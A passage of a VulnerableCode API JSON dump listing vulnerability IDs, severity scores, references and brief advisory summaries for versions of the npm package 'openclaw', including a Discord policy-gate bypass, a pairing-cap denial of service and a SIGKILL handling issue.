D-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCI
D-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCI
D-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35666","GHSA-qm9x-v7cx-7rq4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cjjd-hv92-wbfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90868?format=json","vulnerability_id":"VCID-csnc-r6fv-j3en","summary":"OpenClaw's Discord component interaction ingress skips guild/channel policy enforcement\n## Summary\n\nDiscord button and component interaction ingress did not consistently reapply the same guild and channel policy gates used for normal inbound messages.\n\n## Impact\n\nUsers could trigger privileged component actions from contexts that should have been blocked by Discord channel policy.\n\n## Affected Component\n\n`extensions/discord/src/monitor/agent-components.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.14, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `511093d4b3` (`Discord: apply component interaction policy 
gates`).","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv"},{"reference_url":"https://github.com/advisories/GHSA-jp4j-q5fc-58gv","reference_id":"GHSA-jp4j-q5fc-58gv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j
p4j-q5fc-58gv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"v
ulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"v
ulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"v
ulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-jp4j-q5fc-58gv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-csnc-r6fv-j3en"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90131?format=json","vulnerability_id":"VCID-cvmw-sxfq-dyhz","summary":"OpenClaw: Pairing pending-request caps were enforced per channel instead of per account\n## Summary\n\nBefore OpenClaw 2026.3.31, pending pairing-request caps were enforced per channel file instead of per account. On multi-account channel setups, requests from other accounts could fill the shared pending window and block new pairing challenges on an unaffected account.\n\n## Impact\n\nThis issue could deny new pairing or onboarding on another account until an existing request was approved or expired. It was an availability-only bug; it did not allow cross-account approval, data access, or authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.26, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9bc1f896c8cd325dd4761681e9bdb8c425f69785` — scope pending request caps per account\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. 
The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41346","reference_id":"","reference_type":"","scores":[{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37899","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.3787","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37901","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41346"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"}],"url":"https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scori
ng_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41346","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41346"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement"},{"reference_url":"https://github.com/advisories/GHSA-wwfp-w96m-c6x8","reference_id":"GHSA-wwfp-w96m-c6x8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"h
ttps://github.com/advisories/GHSA-wwfp-w96m-c6x8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulner
ability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulner
ability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41346","GHSA-wwfp-w96m-c6x8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cvmw-sxfq-dyhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90875?format=json","vulnerability_id":"VCID-cvxu-rdbu-abd2","summary":"OpenClaw has incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n\n**Description**:\n### Summary\nThe `!stop` (and `/bash stop`) chat command kills background bash processes using `SIGKILL` directly, without first sending `SIGTERM` to allow graceful shutdown. This is because `bash-command.ts` imports `killProcessTree()` from `src/agents/shell-utils.ts`, which still contains the pre-CVE-2026-27486 aggressive kill logic, rather than 